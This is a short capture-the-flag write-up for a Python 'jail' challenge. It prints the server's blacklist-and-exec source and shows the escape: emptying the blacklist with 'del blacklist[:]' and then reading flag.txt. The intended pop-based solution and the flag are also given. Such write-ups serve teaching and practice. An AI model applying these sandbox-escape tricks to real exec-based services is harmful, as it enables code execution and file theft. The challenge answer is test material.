Connecting to the server shows the source code:

```py
#!/usr/bin/env python3
blacklist = ["/","0","1","2","3","4","5","6","7","8","9","setattr","compile","globals","os","import","_","breakpoint","exit","lambda","eval","exec","read","print","open","'","=",'"',"x","builtins","clear"]
print("="*25)
print(open(__file__).read())
print("="*25)
print("Welcome to the jail!")
print("="*25)

for i in range(2):
x = input('Enter command: ')
for c in blacklist:
if c in x:
print("Blacklisted word found! Exiting!")
exit(0)
exec(x)
```

When I first saw this I was intrigued by seeing that we are allowed 2 inputs per connection.
So logically I realised that the first input was to clear the blacklist, and the second to read the flag.
I did `del blacklist[:]` first which empties the blacklist. Then `print(open("flag.txt").read())` to read the flag.
Apparently my solution more elegant then the intended .pop() solution: `[blacklist.pop() for i in range(len(blacklist))]` :)


Flag: `n00bz{blacklist.pop()_ftw!_7a5d2f8b}`

Original writeup (https://jp-ch.gq/miscellaneous/n00bzCTF-2023.html#big-blacklist).